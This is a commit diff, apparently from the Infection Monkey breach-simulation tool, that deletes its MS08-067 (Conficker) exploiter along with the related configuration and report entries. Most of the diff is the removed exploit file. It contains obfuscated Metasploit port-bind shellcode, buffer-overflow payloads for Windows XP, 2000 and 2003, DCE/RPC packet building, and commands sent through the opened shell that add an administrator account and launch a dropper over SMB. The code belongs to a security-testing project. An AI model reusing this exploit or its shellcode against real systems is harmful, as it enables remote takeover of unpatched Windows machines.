Agent, Island: Remove MS08_67 exploiter

Ilija Lazoroski 2022-01-27 16:45:55 +01:00
parent 3fc8621e16
commit ff87252a24
11 changed files with 1 additions and 394 deletions


@ -146,9 +146,6 @@ class Configuration(object):
skip_exploit_if_file_exist = False
ms08_067_exploit_attempts = 5
user_to_add = "Monkey_IUSER_SUPPORT"
###########################
# ransomware config
###########################


@ -43,8 +43,6 @@
],
"monkey_log_path_windows": "%temp%\\~df1563.tmp",
"monkey_log_path_linux": "/tmp/user-1563",
"ms08_067_exploit_attempts": 5,
"user_to_add": "Monkey_IUSER_SUPPORT",
"ping_scan_timeout": 10000,
"smb_download_timeout": 300,
"smb_service_name": "InfectionMonkey",


@ -1,320 +0,0 @@
#!/usr/bin/env python
#############################################################################
# MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)
# www.hackingspirits.com
# www.coffeeandsecurity.com
# Email: d3basis.m0hanty @ gmail.com
#############################################################################
import socket
import time
from enum import IntEnum
from logging import getLogger
from impacket import uuid
from impacket.dcerpc.v5 import transport
from common.utils.shellcode_obfuscator import clarify
from infection_monkey.exploit.HostExploiter import HostExploiter
from infection_monkey.exploit.tools.helpers import get_monkey_depth, get_target_monkey
from infection_monkey.exploit.tools.smb_tools import SmbTools
from infection_monkey.model import DROPPER_CMDLINE_WINDOWS, MONKEY_CMDLINE_WINDOWS
from infection_monkey.network.smbfinger import SMBFinger
from infection_monkey.network.tools import check_tcp_port
from infection_monkey.utils.commands import build_monkey_commandline
from infection_monkey.utils.random_password_generator import get_random_password
logger = getLogger(__name__)
# Portbind shellcode from metasploit; Binds port to TCP port 4444
OBFUSCATED_SHELLCODE = (
b"4\xf6kPF\xc5\x9b<K\xf8Q\t\xff\xc94\xa9('\xa5%4m\xcd\xa0c\xd9"
b"\xd4Y\xca\x80*\xa7S\x98\xb3n+k\xe5\xe3\xffR\x85\xf4k\xb2\xd3"
b"\xaa\x10*\x0f\xb5\xdc-W(\x9c\xfe\xfa\xb8\x0eT1\xce\x8a\x9b\x0c"
b'\xd4"v\x04\xac~\xec\x04\xb07v\x81\xfd\xed\xd6\x11\x82\xbaN\x1f+'
b"\xd6\x9a\xda\xb5yyP\xf2\r\x8ev\x87\xed\x1eU\xa8\xcd\xc3\xba\x9c"
b"\x02\xf5\x7f\xb1\xed\xfaN(|\xf7\x1aBPw\xdf!\x86\xd2\x8a\xfe\x1b"
b"\x01\xc3\x9d\x802\xeeQ\x13\xff\xde\x95\xe0u\xa5\x19\xc8\xdd"
b"\xab[\x86\xdf\xf8\x84\xc6{\xe0W\x9b\xb0[\x05bA\xfc\xde\xa8B"
b"\x91b\xfey\x152q4\x15\xa7\x91)\xe8\x8b@\xe8\x8bC\xfc\xa6\x7f"
b"\xfc%!_\xef\xe8\x13\xc3\xb4NDA\x0e%\xee\xbdK]L\xa2\x83|\xb3"
b"\xa2\xd3\x97]\xd8b\x03\xa7\x0c}\x93\x85\x18\x16\xff\xf1\xfe"
b"\xff\xe0E\x0b\xb6\xdb\xdc\xe5\xdb\xc5zr\xf1\r3\xd0\xf5\x80"
b"\x89\x86V\x97\x1a\xf2f\x95\x89\xd5\xce\x9a\xee\xa1\xcf\x97"
b"\x92\xc5Bx{7\x0cv\xa6\x9d\xaaf\xa4\xb4\x1e\x9ex\x1f\x91N\xe7ZY"
b"\xa90\xcd\x94\xb7\x800'\r\x19W\x86\x9d~\x87\x9a\x8e\x8c\x90Gq"
b"\x84sB\x07\x10\x8etP\xa5\xfe\x89\x1b\xfe\x0f\xa9&\xab\x19\x1fh"
b"\x18b\xd2y\xbd\xd1\xefe\x14p\xe5{ZW\x00T\xf8\x89\x8d\r\xd48\xb1V"
b"\xd9\xc3%\x89\x9c\x8e\x11\x00\x96\xe3\xd8\x80\\\x07\xc8d\x7f:\xc3T"
b"\xb8\xd1s#\xc0\x04\xcdL\xab\x87\xf0ff\xc2\x02\xe8j\x91\x0eF\x9c[\xb79"
b"\x13J\xcdf\xbd\x83\x84\xe2\x08\xe5\xcf\xb6\xda\xda\x07\xaa$\xfe($"
b"\x86\x0bO\xcb\x8fj\xf6\x15\xb9B\x82\x0c\x7f\xf5!\xad5j\xc7R\x1c"
b"\x95\xe7V^O\xdak\xa0q\x81\xf81\xe3lq{\x0f\xdb\ta\xe7>I,\xab\x1d"
b"\xa0\x92Y\x88\x1b$\xa0hK\x03\x0b\x0b\xcf\xe7\xff\x9f\x9d\xb6&J"
b"\xdf\x1b\xad\x1b5\xaf\x84\xed\x99\x01'\xa8\x03\x90\x01\xec\x13"
b"\xfb\xf9!\x11\x1dc\xd9*\xb4\xd8\x9c\xf1\xb8\xb9\xa1;\x93\xc1\x8dq"
b"\xe4\xe1\xe5?%\x1a\x96\x96\xb5\x94\x19\xb5o\x0c\xdb\x89Cq\x14M\xf8"
b"\x02\xfb\xe5\x88hL\xc4\xcdd\x90\x8bc\xff\xe3\xb8z#\x174\xbd\x00J"
b'\x1c\xc1\xccM\x94\x90tm\x89N"\xd4-'
)
SHELLCODE = clarify(OBFUSCATED_SHELLCODE).decode()
XP_PACKET = (
"\xde\xa4\x98\xc5\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x41\x00\x42\x00\x43"
"\x00\x44\x00\x45\x00\x46\x00\x47\x00\x00\x00\x36\x01\x00\x00\x00\x00\x00\x00\x36\x01"
"\x00\x00\x5c\x00\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47"
"\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48"
"\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49"
"\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90" + SHELLCODE + "\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00"
"\x2e\x00\x5c\x00\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00\x08\x04\x02"
"\x00\xc2\x17\x89\x6f\x41\x41\x41\x41\x07\xf8\x88\x6f\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x90\x90\x90\x90\x90\x90\x90\x90"
"\xeb\x62\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\xe8\x03\x00\x00\x02\x00\x00"
"\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5c\x00\x00\x00\x01\x10\x00\x00\x00\x00\x00\x00"
)
# Payload for Windows 2000 target
PAYLOAD_2000 = "\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00"
PAYLOAD_2000 += "\x41\x41\x41\x41\x41\x41\x41\x41"
PAYLOAD_2000 += "\x41\x41\x41\x41\x41\x41\x41\x41"
PAYLOAD_2000 += "\x41\x41"
PAYLOAD_2000 += "\x2f\x68\x18\x00\x8b\xc4\x66\x05\x94\x04\x8b\x00\xff\xe0"
PAYLOAD_2000 += "\x43\x43\x43\x43\x43\x43\x43\x43"
PAYLOAD_2000 += "\x43\x43\x43\x43\x43\x43\x43\x43"
PAYLOAD_2000 += "\x43\x43\x43\x43\x43\x43\x43\x43"
PAYLOAD_2000 += "\x43\x43\x43\x43\x43\x43\x43\x43"
PAYLOAD_2000 += "\x43\x43\x43\x43\x43\x43\x43\x43"
PAYLOAD_2000 += "\xeb\xcc"
PAYLOAD_2000 += "\x00\x00"
# Payload for Windows 2003[SP2] target
PAYLOAD_2003 = "\x41\x00\x5c\x00"
PAYLOAD_2003 += "\x2e\x00\x2e\x00\x5c\x00\x2e\x00"
PAYLOAD_2003 += "\x2e\x00\x5c\x00\x0a\x32\xbb\x77"
PAYLOAD_2003 += "\x8b\xc4\x66\x05\x60\x04\x8b\x00"
PAYLOAD_2003 += "\x50\xff\xd6\xff\xe0\x42\x84\xae"
PAYLOAD_2003 += "\xbb\x77\xff\xff\xff\xff\x01\x00"
PAYLOAD_2003 += "\x01\x00\x01\x00\x01\x00\x43\x43"
PAYLOAD_2003 += "\x43\x43\x37\x48\xbb\x77\xf5\xff"
PAYLOAD_2003 += "\xff\xff\xd1\x29\xbc\x77\xf4\x75"
PAYLOAD_2003 += "\xbd\x77\x44\x44\x44\x44\x9e\xf5"
PAYLOAD_2003 += "\xbb\x77\x54\x13\xbf\x77\x37\xc6"
PAYLOAD_2003 += "\xba\x77\xf9\x75\xbd\x77\x00\x00"
class WindowsVersion(IntEnum):
Windows2000 = 1
Windows2003_SP2 = 2
WindowsXP = 3
class SRVSVC_Exploit(object):
TELNET_PORT = 4444
def __init__(self, target_addr, os_version=WindowsVersion.Windows2003_SP2, port=445):
self._port = port
self._target = target_addr
self._payload = PAYLOAD_2000 if WindowsVersion.Windows2000 == os_version else PAYLOAD_2003
self.os_version = os_version
def get_telnet_port(self):
"""get_telnet_port()
The port on which the Telnet service will listen.
"""
return SRVSVC_Exploit.TELNET_PORT
def start(self):
"""start() -> socket
Exploit the target machine and return a socket connected to it's
listening Telnet service.
"""
target_rpc_name = "ncacn_np:%s[\\pipe\\browser]" % self._target
logger.debug("Initiating exploit connection (%s)", target_rpc_name)
self._trans = transport.DCERPCTransportFactory(target_rpc_name)
self._trans.connect()
logger.debug("Connected to %s", target_rpc_name)
self._dce = self._trans.DCERPC_class(self._trans)
self._dce.bind(uuid.uuidtup_to_bin(("4b324fc8-1670-01d3-1278-5a47bf6ee188", "3.0")))
dce_packet = self._build_dce_packet()
self._dce.call(0x1F, dce_packet) # 0x1f (or 31)- NetPathCanonicalize Operation
logger.debug("Exploit sent to %s successfully...", self._target)
logger.debug("Target machine should be listening over port %d now", self.get_telnet_port())
sock = socket.socket()
sock.connect((self._target, self.get_telnet_port()))
return sock
def _build_dce_packet(self):
if self.os_version == WindowsVersion.WindowsXP:
return XP_PACKET
# Constructing Malicious Packet
dce_packet = "\x01\x00\x00\x00"
dce_packet += "\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00"
dce_packet += SHELLCODE
dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41"
dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41"
dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41"
dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41"
dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41"
dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41"
dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41"
dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41"
dce_packet += "\x00\x00\x00\x00"
dce_packet += "\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00"
dce_packet += self._payload
dce_packet += "\x00\x00\x00\x00"
dce_packet += "\x02\x00\x00\x00\x02\x00\x00\x00"
dce_packet += "\x00\x00\x00\x00\x02\x00\x00\x00"
dce_packet += "\x5c\x00\x00\x00\x01\x00\x00\x00"
dce_packet += "\x01\x00\x00\x00"
return dce_packet
class Ms08_067_Exploiter(HostExploiter):
_TARGET_OS_TYPE = ["windows"]
_EXPLOITED_SERVICE = "Microsoft Server Service"
_windows_versions = {
"Windows Server 2003 3790 Service Pack 2": WindowsVersion.Windows2003_SP2,
"Windows Server 2003 R2 3790 Service Pack 2": WindowsVersion.Windows2003_SP2,
"Windows 5.1": WindowsVersion.WindowsXP,
}
def __init__(self, host):
super(Ms08_067_Exploiter, self).__init__(host)
def is_os_supported(self):
if self.host.os.get("type") in self._TARGET_OS_TYPE and self.host.os.get("version") in list(
self._windows_versions.keys()
):
return True
if not self.host.os.get("type") or (
self.host.os.get("type") in self._TARGET_OS_TYPE and not self.host.os.get("version")
):
is_smb_open, _ = check_tcp_port(self.host.ip_addr, 445)
if is_smb_open:
smb_finger = SMBFinger()
if smb_finger.get_host_fingerprint(self.host):
return self.host.os.get("type") in self._TARGET_OS_TYPE and self.host.os.get(
"version"
) in list(self._windows_versions.keys())
return False
def _exploit_host(self):
src_path = get_target_monkey(self.host)
if not src_path:
logger.info("Can't find suitable monkey executable for host %r", self.host)
return False
os_version = self._windows_versions.get(
self.host.os.get("version"), WindowsVersion.Windows2003_SP2
)
exploited = False
random_password = get_random_password()
for _ in range(self._config.ms08_067_exploit_attempts):
exploit = SRVSVC_Exploit(target_addr=self.host.ip_addr, os_version=os_version)
try:
sock = exploit.start()
sock.send(
"cmd /c (net user {} {} /add) &&"
" (net localgroup administrators {} /add)\r\n".format(
self._config.user_to_add,
random_password,
self._config.user_to_add,
).encode()
)
time.sleep(2)
sock.recv(1000)
logger.debug("Exploited into %r using MS08-067", self.host)
exploited = True
break
except Exception as exc:
logger.debug("Error exploiting victim %r: (%s)", self.host, exc)
continue
if not exploited:
logger.debug("Exploiter MS08-067 is giving up...")
return False
# copy the file remotely using SMB
remote_full_path = SmbTools.copy_file(
self.host,
src_path,
self._config.dropper_target_path_win_32,
self._config.user_to_add,
random_password,
)
if not remote_full_path:
# try other passwords for administrator
for password in self._config.exploit_password_list:
remote_full_path = SmbTools.copy_file(
self.host,
src_path,
self._config.dropper_target_path_win_32,
"Administrator",
password,
)
if remote_full_path:
break
if not remote_full_path:
return True
# execute the remote dropper in case the path isn't final
if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
cmdline = DROPPER_CMDLINE_WINDOWS % {
"dropper_path": remote_full_path
} + build_monkey_commandline(
self.host,
get_monkey_depth() - 1,
self._config.dropper_target_path_win_32,
)
else:
cmdline = MONKEY_CMDLINE_WINDOWS % {
"monkey_path": remote_full_path
} + build_monkey_commandline(self.host, get_monkey_depth() - 1)
try:
sock.send(("start %s\r\n" % (cmdline,)).encode())
sock.send(("net user %s /delete\r\n" % (self._config.user_to_add,)).encode())
except Exception as exc:
logger.debug(
"Error in post-debug phase while exploiting victim %r: (%s)", self.host, exc
)
return True
finally:
try:
sock.close()
except socket.error:
pass
logger.info(
"Executed monkey '%s' on remote victim %r (cmdline=%r)",
remote_full_path,
self.host,
cmdline,
)
return True


@ -42,17 +42,6 @@ EXPLOITER_CLASSES = {
"link": "https://www.guardicore.com/infectionmonkey/docs/reference"
"/exploiters/mssql/",
},
{
"type": "string",
"enum": ["Ms08_067_Exploiter"],
"title": "MS08-067 Exploiter",
"safe": False,
"info": "Unsafe exploiter, that might cause system crash due to the use of buffer "
"overflow. "
"Uses MS08-067 vulnerability.",
"link": "https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/ms08"
"-067/",
},
{
"type": "string",
"enum": ["SSHExploiter"],


@ -266,24 +266,6 @@ INTERNAL = {
}
},
},
"ms08_067": {
"title": "MS08_067",
"type": "object",
"properties": {
"ms08_067_exploit_attempts": {
"title": "MS08_067 exploit attempts",
"type": "integer",
"default": 5,
"description": "Number of attempts to exploit using MS08_067",
},
"user_to_add": {
"title": "Remote user",
"type": "string",
"default": "Monkey_IUSER_SUPPORT",
"description": "Username to add on successful exploit",
},
},
},
},
"smb_service": {
"title": "SMB service",


@ -34,7 +34,6 @@ class ExploiterDescriptorEnum(Enum):
ELASTIC = ExploiterDescriptor(
"ElasticGroovyExploiter", "Elastic Groovy Exploiter", ExploitProcessor
)
MS08_067 = ExploiterDescriptor("Ms08_067_Exploiter", "Conficker Exploiter", ExploitProcessor)
SHELLSHOCK = ExploiterDescriptor(
"ShellShockExploiter", "ShellShock Exploiter", ShellShockExploitProcessor
)


@ -30,7 +30,6 @@ import {sshKeysReport, shhIssueReport, sshIssueOverview} from './security/issues
import {elasticIssueOverview, elasticIssueReport} from './security/issues/ElasticIssue';
import {shellShockIssueOverview, shellShockIssueReport} from './security/issues/ShellShockIssue';
import {log4shellIssueOverview, log4shellIssueReport} from './security/issues/Log4ShellIssue';
import {ms08_067IssueOverview, ms08_067IssueReport} from './security/issues/MS08_067Issue';
import {
crossSegmentIssueOverview,
crossSegmentIssueReport,
@ -136,11 +135,6 @@ class ReportPageComponent extends AuthComponent {
[this.issueContentTypes.REPORT]: powershellIssueReport,
[this.issueContentTypes.TYPE]: this.issueTypes.DANGER
},
'Ms08_067_Exploiter': {
[this.issueContentTypes.OVERVIEW]: ms08_067IssueOverview,
[this.issueContentTypes.REPORT]: ms08_067IssueReport,
[this.issueContentTypes.TYPE]: this.issueTypes.DANGER
},
'ZerologonExploiter': {
[this.issueContentTypes.OVERVIEW]: zerologonIssueOverview,
[this.issueContentTypes.REPORT]: zerologonIssueReport,


@ -1,24 +0,0 @@
import React from 'react';
import CollapsibleWellComponent from '../CollapsibleWell';
export function ms08_067IssueOverview() {
return (<li>Machines are vulnerable to Conficker (<a
href="https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2008/ms08-067"
>MS08-067</a>). </li>)
}
export function ms08_067IssueReport(issue) {
return (
<>
Install the latest Windows updates or upgrade to a newer operating system.
<CollapsibleWellComponent>
The machine <span className="badge badge-primary">{issue.machine}</span> (<span
className="badge badge-info" style={{margin: '2px'}}>{issue.ip_address}</span>) is vulnerable to a <span
className="badge badge-danger">Conficker</span> attack.
<br/>
The attack was made possible because the target machine used an outdated and unpatched operating system
vulnerable to Conficker.
</CollapsibleWellComponent>
</>
);
}


@ -76,7 +76,6 @@
"max_depth": null,
"monkey_log_path_linux": "/tmp/user-1563",
"monkey_log_path_windows": "%temp%\\~df1563.tmp",
"ms08_067_exploit_attempts": 5,
"ping_scan_timeout": 1000,
"post_breach_actions": [
"CommunicateAsBackdoorUser",
@ -120,6 +119,5 @@
3306,
7001,
8088
],
"user_to_add": "Monkey_IUSER_SUPPORT"
]
}


@ -121,10 +121,6 @@
"exploit_ssh_keys": [],
"general": {
"skip_exploit_if_file_exist": false
},
"ms08_067": {
"ms08_067_exploit_attempts": 5,
"user_to_add": "Monkey_IUSER_SUPPORT"
}
},
"testing": {


@ -59,7 +59,6 @@ password_restored # unused variable (monkey/monkey_island/cc/services/reporting
SSH # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:30)
SAMBACRY # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:31)
ELASTIC # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:32)
MS08_067 # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:35)
SHELLSHOCK # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:36)
STRUTS2 # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:39)
WEBLOGIC # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:40)
@ -129,7 +128,6 @@ ts # unused variable (monkey/infection_monkey/exploit/zerologon_utils/options.p
opnum # unused variable (monkey/infection_monkey/exploit/zerologon.py:466)
structure # unused variable (monkey/infection_monkey/exploit/zerologon.py:467)
structure # unused variable (monkey/infection_monkey/exploit/zerologon.py:478)
_._port # unused attribute (monkey/infection_monkey/exploit/win_ms08_067.py:123)
oid_set # unused variable (monkey/infection_monkey/exploit/tools/wmi_tools.py:96)
export_monkey_telems # unused variable (monkey/infection_monkey/config.py:282)
NoInternetError # unused class (monkey/common/utils/exceptions.py:33)